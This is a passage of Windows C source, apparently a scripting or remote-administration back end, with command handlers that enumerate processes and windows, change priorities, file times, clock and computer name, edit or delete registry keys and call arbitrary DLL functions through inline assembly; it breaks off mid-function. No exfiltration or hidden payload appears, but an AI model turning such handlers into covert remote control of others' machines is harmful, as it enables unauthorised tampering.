    static char     Buf[ MAX_PATH + 32 ];

    Shh = ThCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if( Shh == INVALID_HANDLE_VALUE ) {
      SetReply( Result, ERR_API_ERROR, "ThCreateToolhelp32Snapshot" );
      return 1;
    }
    Pe.dwSize = sizeof( Pe );
    if( ! ThProcess32First( Shh, &Pe ) )
      SetReply( Result, ERR_API_ERROR, "ThProcess32First" );
    else {
      SetReply( Result, ERR_NO_ERROR, "" );
      do {
        Ph = OpenProcess( PROCESS_ALL_ACCESS, FALSE, Pe.th32ProcessID );
        wsprintf( Buf, "%08X %08X %s", Pe.th32ProcessID,
                  GetPriorityClass( Ph ),  Pe.szExeFile );
        CloseHandle( Ph );
        AddToStringList( Result, Buf );
      } while( ThProcess32Next( Shh, &Pe ) );
    }
    ThCloseHandle( Shh );
    return 1;
  }

FUNCDEF( GetPClass )
  {
    DWORD  PClass;
    char   Str[ 64 ];
    HANDLE Ph;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<process id (hex)>" );
      return 1;
    }
    Ph = OpenProcess( PROCESS_ALL_ACCESS, FALSE,
                      Strtoul( Params->Value[1], NULL, 16 ) );
    if( Ph == NULL ) {
      SetReply( Result, ERR_API_ERROR, "OpenProcess" );
      return 1;
    }
    PClass = GetPriorityClass( Ph );
    if( PClass == 0 )
      SetReply( Result, ERR_API_ERROR, "GetPriorityClass" );
    else {
      SetReply( Result, ERR_NO_ERROR, "" );
      wsprintf( Str, "%08X", PClass );
      AddToStringList( Result, Str );
    }
    CloseHandle( Ph );
    return 1;
  }

FUNCDEF( SetPClass )
  {
    HANDLE  Ph;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<process id (hex)> <priority class (hex)>" );
      return 1;
    }
    Ph = OpenProcess( PROCESS_ALL_ACCESS, FALSE,
                      Strtoul( Params->Value[1], NULL, 16 ) );
    if( Ph == NULL ) {
      SetReply( Result, ERR_API_ERROR, "OpenProcess" );
      return 1;
    }
    if( SetPriorityClass( Ph, Strtoul( Params->Value[2], NULL, 16 ) ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "SetPriorityClass" );
    CloseHandle( Ph );
    return 1;
  }

static void GetClassNCaption( HWND WinH, STRINGLIST* s, char* Buf )
  {
    lstrcpy( Buf, "    Class: " );
    GetClassName( WinH, Buf + 11, MAX_PATH );
    AddToStringList( s, Buf );
    lstrcpy( Buf, "    Caption: " );
    GetWindowText( WinH, Buf + 13, MAX_PATH );
    AddToStringList( s, Buf );
  }

static void GetWindowProcess( HWND WinH, DWORD Pid, void** Params )
  {
    PROCESSENTRY32  Pe;
    char     Str[ MAX_PATH * 2 ];

    lstrcpy( Str, "    Process: " );
    Pe.dwSize = sizeof( Pe );
    if( ThProcess32First( (HANDLE) (Params[1]), &Pe ) ) {
      do {
        if( Pid == Pe.th32ProcessID ) {
          lstrcpy( &Str[13], Pe.szExeFile );
        }
      } while( ThProcess32Next( (HANDLE) (Params[1]), &Pe ) );
    }
    AddToStringList( (STRINGLIST*) (Params[0]), Str );
  }

static void GetWindowInfo( HWND WinH, LPDWORD Pid, void** Params )
  {
    char     Str[ MAX_PATH * 2 ];
    DWORD    Tid, Style, ExStyle, Parent;
    BOOL     Enabled, Visible, Zoomed, Iconic, Unicode;

    Tid = GetWindowThreadProcessId( WinH, Pid );
    Style = GetWindowLong( WinH, GWL_STYLE );
    ExStyle = GetWindowLong( WinH, GWL_EXSTYLE );
    Parent = GetWindowLong( WinH, GWL_HWNDPARENT );
    Enabled = IsWindowEnabled( WinH );
    Visible = IsWindowVisible( WinH );
    Zoomed = IsZoomed( WinH );
    Iconic = IsIconic( WinH );
    Unicode = IsWindowUnicode( WinH );
    wsprintf( Str,
              "HWND=%08X PID=%08X TID=%08X STYLE=%08X EXSTYLE=%08X PARENT=%08X %s %s %s %s",
              WinH, *Pid, Tid, Style, ExStyle, Parent,
              Enabled? "ENABLED " : "DISABLED",
              Visible? "VISIBLE  " : "INVISIBLE",
              Zoomed? "MAXIMIZED" : (Iconic? "MINIMIZED" : "NORMAL   "),
              Unicode? "UNICODE   " : "ASCII-ANSI" );
    AddToStringList( (STRINGLIST*) (Params[0]), Str );
    GetClassNCaption( WinH, (STRINGLIST*) (Params[0]), Str );
  }

static BOOL CALLBACK GetWndEnumCallback( HWND WinH, LPARAM lparam )
  {
    DWORD  Pid;

    GetWindowInfo( WinH, &Pid, (void**) lparam );
    GetWindowProcess( WinH, Pid, (void**) lparam );
    return TRUE;
  }

static BOOL CALLBACK GetChildWndEnumCallback( HWND WinH, LPARAM lparam )
  {
    DWORD  Pid;

    GetWindowInfo( WinH, &Pid, (void**) lparam );
    return TRUE;
  }

FUNCDEF( GetWindows )
  {
    void*   Prm[2];

    Prm[0] = (void*) Result;
    Prm[1] = (void*) ThCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    SetReply( Result, ERR_NO_ERROR, "" );
    EnumWindows( (WNDENUMPROC) GetWndEnumCallback, (LPARAM) &Prm );
    if( INVALID_HANDLE_VALUE != (HANDLE) Prm[1] )
      ThCloseHandle( (HANDLE) Prm[1] );
    return 1;
  }

FUNCDEF( GetChildWindows )
  {
    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<window handle (hex)>" );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    EnumChildWindows( (HWND) Strtoul( Params->Value[1], NULL, 16 ),
                      (WNDENUMPROC) GetChildWndEnumCallback, (LPARAM) Result );
    return 1;
  }

FUNCDEF( SetFTime )
  {
    SYSTEMTIME Stm;
    char*      cp;
    char       FileName[ MAX_PATH ];

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<file name> <H M S D M Y>" );
      return 1;
    }
    Stm.wHour = (WORD) Strtoul( Params->Value[2], &cp, 0 );
    Stm.wMinute = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wSecond = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wDay = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wMonth = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wYear = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wDayOfWeek = 0;
    Stm.wMilliseconds = 0;
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    if( SetLocalFileTime( FileName, &Stm ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "SetFileTime" );
    return 1;
  }

FUNCDEF( GetDesktopHWND )
  {
    char Buf[ 16 ];

    SetReply( Result, ERR_NO_ERROR, "" );
    wsprintf( Buf, "%08X", GetDesktopWindow() );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( FuncGetWindow )
  {
    void*   Prm[2];
    UINT    Cmd;
    HWND    WinH;
    DWORD   Pid;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<window handle (hex)> <mode (hex)>" );
      return 1;
    }
    Prm[0] = (void*) Result;
    Prm[1] = (void*) ThCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    Cmd = (UINT) Strtoul( Params->Value[2], NULL, 16 );
    WinH = (HWND) Strtoul( Params->Value[1], NULL, 16 );
    SetReply( Result, ERR_NO_ERROR, "" );
    if( Cmd == GW_HWNDNEXT || Cmd == GW_HWNDPREV ) {
      while( (WinH = GetWindow( WinH, Cmd )) != NULL )
        GetWindowInfo( WinH, &Pid, &Prm );
    }
    else {
      if( (WinH = GetWindow( WinH, Cmd )) != NULL )
        GetWindowInfo( WinH, &Pid, &Prm );
    }
    if( INVALID_HANDLE_VALUE != (HANDLE) Prm[1] )
      CloseHandle( (HANDLE) Prm[1] );
    return 1;
  }

FUNCDEF( SetWindowCaption )
  {
    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<window handle (hex)> <caption>" );
      return 1;
    }
    if( SetWindowText( (HWND) Strtoul( Params->Value[1], NULL, 16 ),
                       Params->Value[2] ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "SetWindowText" );
    return 1;
  }

FUNCDEF( GetSysInfo )
  {
    char   Buf[ MAX_PATH ];
    DWORD  Sz;

    SetReply( Result, ERR_NO_ERROR, "" );
    GetWindowsDirectory( Buf, MAX_PATH );
    AddToStringList( Result, Buf );
    GetSystemDirectory( Buf, MAX_PATH );
    AddToStringList( Result, Buf );
    Buf[0] = '\0'; Sz = MAX_PATH;
    GetComputerName( Buf, &Sz );
    AddToStringList( Result, Buf );
    Buf[0] = '\0'; Sz = MAX_PATH;
    GetUserName( Buf, &Sz );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( SetCompName )
  {
    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<computer name>" );
      return 1;
    }
    if( SetComputerName( Params->Value[1] ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "SetComputerName" );
    return 1;
  }

FUNCDEF( GetTime )
  {
    SYSTEMTIME  STime;
    char   Buf[ 128 ];

    GetLocalTime( &STime );
    SetReply( Result, ERR_NO_ERROR, "" );
    wsprintf( Buf, "%2d/%02d/%4d %2d:%02d:%02d",
                    STime.wDay, STime.wMonth, STime.wYear,
                    STime.wHour, STime.wMinute, STime.wSecond );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( SetTime )
  {
    SYSTEMTIME Stm;
    char*      cp;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<H M S D M Y>" );
      return 1;
    }
    Stm.wHour = (WORD) Strtoul( Params->Value[1], &cp, 0 );
    Stm.wMinute = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wSecond = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wDay = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wMonth = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wYear = (WORD) Strtoul( cp+1, &cp, 0 );
    Stm.wDayOfWeek = 0;
    Stm.wMilliseconds = 0;
    if( SetLocalTime( &Stm ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR, "SetLocalTime" );
    return 1;
  }

FUNCDEF( SetRegistrySz )
  {
    HKEY   KeyH, Rk;

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <value name> <value>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegSetValueEx( KeyH, Params->Value[2], 0, REG_SZ,
                       (LPBYTE) Params->Value[3],
                       lstrlen( Params->Value[3] ) + 1 ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
    else
      SetReply( Result, ERR_NO_ERROR, "" );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( SetRegistryDword )
  {
    HKEY   KeyH, Rk;
    DWORD  Val;

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <value name> <value>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    Val = Strtoul( Params->Value[3], NULL, 0 );
    if( RegSetValueEx( KeyH, Params->Value[2], 0, REG_DWORD,
                   (LPBYTE) &Val, sizeof(DWORD) ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
    else
      SetReply( Result, ERR_NO_ERROR, "" );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( DeleteRegistryValue )
  {
    HKEY   KeyH, Rk;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <value name>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegDeleteValue( KeyH, Params->Value[2] ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegDeleteValue" );
    else
      SetReply( Result, ERR_NO_ERROR, "" );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( DeleteRegistryKey )
  {
    HKEY   KeyH, Rk;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <subkey name>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegDeleteKey( KeyH, Params->Value[2] ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegDeleteKey" );
    else
      SetReply( Result, ERR_NO_ERROR, "" );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( SetRegistryBinary )
  {
    HKEY   KeyH, Rk;
    BYTE   *Val;

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <value name> <value>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( (Val = StrToBinary( Params->Value[3] )) == NULL ) {
      SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      return 1;
    }
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
    else {
      if( RegSetValueEx( KeyH, Params->Value[2], 0, REG_BINARY,
                Val, (lstrlen( Params->Value[3] ) + 1) >> 1 ) != ERROR_SUCCESS )
        SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
      else
        SetReply( Result, ERR_NO_ERROR, "" );
      RegCloseKey( KeyH );
    }
    LocalFree( Val );
    return 1;
  }

FUNCDEF( SetRegistryValue )
  {
    HKEY   KeyH, Rk;
    BYTE   *Val;

    if( Params->Count <= 4 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <value type (hex)> <value name> <value>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( (Val = StrToBinary( Params->Value[4] )) == NULL ) {
      SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      return 1;
    }
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS )
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
    else {
      if( RegSetValueEx( KeyH, Params->Value[3], 0,
                Strtoul( Params->Value[2], NULL, 16 ),
                Val, (lstrlen( Params->Value[4] ) + 1) >> 1 ) != ERROR_SUCCESS )
        SetReply( Result, ERR_API_ERROR, "RegSetValueEx" );
      else
        SetReply( Result, ERR_NO_ERROR, "" );
      RegCloseKey( KeyH );
    }
    LocalFree( Val );
    return 1;
  }

FUNCDEF( CreateRegistrySubkey )
  {
    HKEY   KeyH, Rk, SubkeyH;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<registry key> <subkey name>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegCreateKey( KeyH, Params->Value[2], &SubkeyH ) == ERROR_SUCCESS ) {
      RegCloseKey( SubkeyH );
      SetReply( Result, ERR_NO_ERROR, "" );
    }
    else
      SetReply( Result, ERR_API_ERROR, "RegCreateKey" );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( WinMsg )
  {
    WPARAM  wparam;
    LPARAM  lparam;
    BYTE    *wp = NULL, *lp = NULL;
    char    Buf[ 32 ];
    char    MsgBuf[ 64 ];
    int     ecode;

    if( Params->Count <= 4 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<window handle (hex)> <message> <wparam> <lparam>" );
      return 1;
    }
    if( Params->Value[3][0] == 'p' ) {
      if( (wp = StrToBinary( Params->Value[3] + 1 )) == NULL ) {
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        return 1;
      }
      wparam = (WPARAM) wp;
    }
    else
      wparam = (WPARAM) Strtoul( Params->Value[3], NULL, 0 );

    if( Params->Value[4][0] == 'p' ) {
      if( (lp = StrToBinary( Params->Value[4] + 1 )) == NULL ) {
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        if( wp != NULL ) LocalFree( wp );
        return 1;
      }
      lparam = (LPARAM) lp;
    }
    else
      lparam = (LPARAM) Strtoul( Params->Value[4], NULL, 0 );

    _try {
      wsprintf( Buf, "%d",
                SendMessage( (HWND) Strtoul( Params->Value[1], NULL, 16 ),
                      Strtoul( Params->Value[2], NULL, 0 ), wparam, lparam ) );
      SetReply( Result, ERR_NO_ERROR, "" );
      AddToStringList( Result, Buf );
    }
    _except (EXCEPTION_EXECUTE_HANDLER) {
      ecode = GetExceptionCode();
      wsprintf( MsgBuf, ", code %d (0x%08X)", ecode, ecode );
      SetReply( Result, ERR_EXCEPTION, MsgBuf );
    }
    if( wp != NULL )
      BinaryToStrBuf( (BYTE*) wp,
                      lstrlen( Params->Value[3] ) >> 1, Params->Value[3] );
    if( lp != NULL )
      BinaryToStrBuf( (BYTE*) lp,
                      lstrlen( Params->Value[4] ) >> 1, Params->Value[4] );
    AddToStringList( Result, Params->Value[3] );
    AddToStringList( Result, Params->Value[4] );
    if( lp != NULL ) LocalFree( lp );
    if( wp != NULL ) LocalFree( wp );
    return 1;
  }

FUNCDEF( GetColors )
  {
    char     *cpi, *cp, *Str;
    char     Buf[ 64 ];
    DWORD    cv;
    int      StrSize = 4096, StrLen = 0, Ok = 1;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<color indexes>" );
      return 1;
    }
    Str = (char*) LocalAlloc( LMEM_FIXED, StrSize );
    if( Str == 0 ) {
      SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      return 1;
    }
    cpi = Params->Value[1];
    while( *cpi != '\0' ) {
      cv = GetSysColor( Strtoul( cpi, &cpi, NULL ) );
      wsprintf( Buf, " %3d %3d %3d",
                cv & 255, (cv >> 8) & 255, (cv >> 16) & 255 );
      if( StrLen + 13 >= StrSize ) {
        cp = (char*) LocalReAlloc( (HLOCAL) Str, StrSize + 4096, 0 );
        if( cp == 0 ) {
          SetReply( Result, ERR_OUT_OF_MEMORY, "" );
          Ok = 0; break;
        }
        StrSize += 4096;
        Str = cp;
      }
      lstrcpy( Str + StrLen, Buf );
      StrLen += 12;
    }
    if( Ok ) {
      SetReply( Result, ERR_NO_ERROR, "" );
      if( Str != NULL ) AddToStringList( Result, Str );
      else AddToStringList( Result, "" );
    }
    if( Str != NULL ) LocalFree( Str );
    return 1;
  }

FUNCDEF( SetColors )
  {
    char      *cpi, *cpv;
    COLORREF  cv;
    BYTE      r, g, b;
    int       ci;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<color indexes> <color values>" );
      return 1;
    }
    cpi = Params->Value[1];
    cpv = Params->Value[2];
    while( *cpi != '\0' ) {
      ci = Strtoul( cpi, &cpi, NULL );
      if( *cpv != '\0' ) {
        r = (BYTE) Strtoul( cpv, &cpv, NULL );
        g = (BYTE) Strtoul( cpv, &cpv, NULL );
        b = (BYTE) Strtoul( cpv, &cpv, NULL );
      }
      cv = ((unsigned) r) + (((unsigned) g) << 8) + (((unsigned) b) << 16);
      SetSysColors( 1, &ci, &cv );
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

FUNCDEF( Spi )
  {
    BYTE    *pvp;
    char    Buf[ 32 ];

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<action> <uiparam> [<pvparam>]" );
      return 1;
    }
    if( Params->Count <= 3 )
      pvp = NULL;
    else {
      if( (pvp = StrToBinary( Params->Value[3] )) == NULL ) {
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        return 1;
      }
    }
    _try {
      wsprintf( Buf, "%d %d",
                SystemParametersInfo( Strtoul( Params->Value[1], NULL, 0 ),
                       Strtoul( Params->Value[2], NULL, 0 ),
                       pvp, 0 ),
               GetLastError() );
      SetReply( Result, ERR_NO_ERROR, "" );
      AddToStringList( Result, Buf );
    }
    _except (EXCEPTION_EXECUTE_HANDLER) {
      SetReply( Result, ERR_EXCEPTION, "" );
    }
    if( pvp != NULL ) {
      BinaryToStrBuf( pvp, lstrlen( Params->Value[3] ) >> 1, Params->Value[3] );
      AddToStringList( Result, Params->Value[3] );
      LocalFree( pvp );
    }
    return 1;
  }

FUNCDEF( AnyCall )
  {
    typedef struct TagPARAM {
      int   DataSize;
      int   PassPointer;
      BYTE* Data;
    } PARAM;

    ULONG  Flags;
    int    i, PCount;
    PARAM  *p = NULL;
    BOOL   FromDLL, FarCall, PushLeftFirst;
    BOOL   DontClearStack, PassResultPtrDelphi;
    int    Optimization;
    int    ResultBufferSz;
    int    RegEAX, RegEDX;
    int    ProcAddr[2];
    int    StackFrameSize = 0;
    BYTE   *ResultBuffer = NULL;
    char   Buf[ 64 ];
    HINSTANCE   InstH;
    char   FileName[ MAX_PATH ];

    extern void DoCall();
#   pragma aux DoCall = \
    "        push  EAX                                                     "\
    "        push  EDX                                                     "\
    "        push  ECX                                                     "\
    "        push  EBX                                                     "\
    "        push  ESI                                                     "\
    "        push  EDI                                                     "\
    "                                                                      "\
    "        cmp   Optimization,1                                          "\
    "        jz    NEAR watcom_optimization                                "\
    "        cmp   Optimization,2                                          "\
    "        jz    NEAR delphi_optimization                                "\
    "                                                                      "\
    "        cmp   PushLeftFirst,0                                         "\
    "        jnz   NEAR push_right_first                                   "\
    "                                                                      "\
    "        mov   ESI,p                                                   "\
    "        cld                                                           "\
    "        mov   ECX,PCount                                              "\
    "    plf_loop:                                                         "\
    "        lodsd                                                         "\
    "        mov   EBX,EAX                                                 "\
    "        lodsd                                                         "\
    "        mov   EDX,EAX                                                 "\
    "        lodsd                                                         "\
    "        or    EDX,EDX                                                 "\
    "        jz    plf_push_value                                          "\
    "        push  EAX                                                     "\
    "        add   StackFrameSize,4                                        "\
    "        jmp   plf_cnt_loop                                            "\
    "    plf_push_value:                                                   "\
    "        mov   EDX,EBX                                                 "\
    "        add   EBX,EAX                                                 "\
    "        mov   EAX,EDX                                                 "\
    "        and   EDX,0FFFFFFFCh                                          "\
    "        and   EAX,3                                                   "\
    "        jz    plf_push_value_loop                                     "\
    "        sub   EBX,EAX                                                 "\
    "        mov   EDI,[EBX]                                               "\
    "        cmp   AL,1                                                    "\
    "        ja    plf_and_2                                               "\
    "        and   EDI,0FFh                                                "\
    "    plf_and_2:                                                        "\
    "        cmp   AL,2                                                    "\
    "        ja    plf_and_3                                               "\
    "        and   EDI,0FFFFh                                              "\
    "    plf_and_3:                                                        "\
    "        and   EDI,0FFFFFFh                                            "\
    "        push  EDI                                                     "\
    "        add   StackFrameSize,4                                        "\
    "    plf_push_value_loop:                                              "\
    "        or    EDX,EDX                                                 "\
    "        jz    plf_cnt_loop                                            "\
    "        sub   EBX,4                                                   "\
    "        mov   EAX,[EBX]                                               "\
    "        push  EAX                                                     "\
    "        add   StackFrameSize,4                                        "\
    "        sub   EDX,4                                                   "\
    "        jmp   plf_push_value_loop                                     "\
    "    plf_cnt_loop:                                                     "\
    "        loop  plf_loop                                                "\
    "        cmp   ResultBufferSz,0                                        "\
    "        jz    NEAR call_routine                                       "\
    "        cmp   PassResultPtrDelphi,0                                   "\
    "        jz    NEAR call_routine                                       "\
    "        push  ResultBuffer                                            "\
    "        add   StackFrameSize,4                                        "\
    "        jmp   NEAR call_routine                                       "\
    "                                                                      "\
    "    push_right_first:                                                 "\
    "                                                                      "\
    "        mov   ESI,p                                                   "\
    "        mov   EAX,PCount                                              "\
    "        mov   ECX,EAX                                                 "\
    "        shl   EAX,2                                                   "\
    "        add   ESI,EAX                                                 "\
    "        shl   EAX,1                                                   "\
    "        add   ESI,EAX                                                 "\
    "        sub   ESI,4                                                   "\
    "        std                                                           "\
    "    prf_loop:                                                         "\
    "        lodsd                                                         "\
    "        mov   EBX,EAX                                                 "\
    "        lodsd                                                         "\
    "        mov   EDX,EAX                                                 "\
    "        lodsd                                                         "\
    "        xchg  EAX,EBX                                                 "\
    "        or    EDX,EDX                                                 "\
    "        jz    prf_push_value                                          "\
    "        push  EAX                                                     "\
    "        add   StackFrameSize,4                                        "\
    "        jmp   prf_cnt_loop                                            "\
    "    prf_push_value:                                                   "\
    "        mov   EDX,EBX                                                 "\
    "        add   EBX,EAX                                                 "\
    "        mov   EAX,EDX                                                 "\
    "        and   EDX,0FFFFFFFCh                                          "\
    "        and   EAX,3                                                   "\
    "        jz    prf_push_value_loop                                     "\
    "        sub   EBX,EAX                                                 "\
    "        mov   EDI,[EBX]                                               "\
    "        cmp   AL,1                                                    "\
    "        ja    prf_and_2                                               "\
    "        and   EDI,0FFh                                                "\
    "    prf_and_2:                                                        "\
    "        cmp   AL,2                                                    "\
    "        ja    prf_and_3                                               "\
    "        and   EDI,0FFFFh                                              "\
    "    prf_and_3:                                                        "\
    "        and   EDI,0FFFFFFh                                            "\
    "        push  EDI                                                     "\
    "        add   StackFrameSize,4                                        "\
    "    prf_push_value_loop:                                              "\
    "        or    EDX,EDX                                                 "\
    "        jz    prf_cnt_loop                                            "\
    "        sub   EBX,4                                                   "\
    "        mov   EAX,[EBX]                                               "\
    "        push  EAX                                                     "\
    "        add   StackFrameSize,4                                        "\
    "        sub   EDX,4                                                   "\
    "        jmp   prf_push_value_loop                                     "\
    "    prf_cnt_loop:                                                     "\
    "        loop  prf_loop                                                "\
    "        cld                                                           "\
    "        cmp   ResultBufferSz,0                                        "\
    "        jz    NEAR call_routine                                       "\
    "        cmp   PassResultPtrDelphi,0                                   "\
    "        jz    NEAR call_routine                                       "\
    "        push  ResultBuffer                                            "\
    "        add   StackFrameSize,4                                        "\
    "        jmp   NEAR call_routine                                       "\
    "                                                                      "\
    "    watcom_optimization:                                              "\
    "                                                                      "\
    "        jmp   call_routine                                            "\
    "                                                                      "\
    "    delphi_optimization:                                              "\
    "                                                                      "\
    "    call_routine:                                                     "\
    "                                                                      "\
    "        mov   ESI,ResultBuffer                                        "\
    "        cmp   FarCall,0                                               "\
    "        jz    near_call                                               "\
    "                                                                      "\
    "        lea   EDI,ProcAddr[0]                                         "\
    "        call  FWORD PTR [EDI]                                         "\
    "        jmp   clear_stack                                             "\
    "                                                                      "\
    "    near_call:                                                        "\
    "                                                                      "\
    "        lea   EDI,ProcAddr[0]                                         "\
    "        call  DWORD PTR EDI                                           "\
    "                                                                      "\
    "    clear_stack:                                                      "\
    "                                                                      "\
    "        cmp   DontClearStack,0                                        "\
    "        jnz   thats_all                                               "\
    "        add   ESP,StackFrameSize                                      "\
    "                                                                      "\
    "    thats_all:                                                        "\
    "                                                                      "\
    "        mov   RegEAX,EAX                                              "\
    "        mov   RegEDX,EDX                                              "\
    "                                                                      "\
    "        pop   EDI                                                     "\
    "        pop   ESI                                                     "\
    "        pop   EBX                                                     "\
    "        pop   ECX                                                     "\
    "        pop   EDX                                                     "\
    "        pop   EAX                                                     ";

#   define Selector   ProcAddr[1]
#   define Offset     ProcAddr[0]

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
         "<flags> <module name/selector> <function name/offset> [<param 1> [...<param N>]]" );
      return 1;
    }
    PCount = Params->Count - 4;
    if( PCount > 0 ) {
      p = (PARAM*) LocalAlloc( LMEM_FIXED, PCount * sizeof( PARAM ) );
      if( p == NULL ) {
        SetReply( Result, ERR_OUT_OF_MEMORY, "" );
        return 1;
      }
      for( i = 0; i < PCount; i++ ) { p[i].DataSize = 0; p[i].Data = NULL; }
      for( i = 0; i < PCount; i++ ) {
        if( Params->Value[i+4][0] == 'p' ) {
          p[i].DataSize = (lstrlen( Params->Value[i+4] + 1 ) + 1) >> 1;
          p[i].PassPointer = 1;
          if( Params->Value[i+4][1] != '\0' )
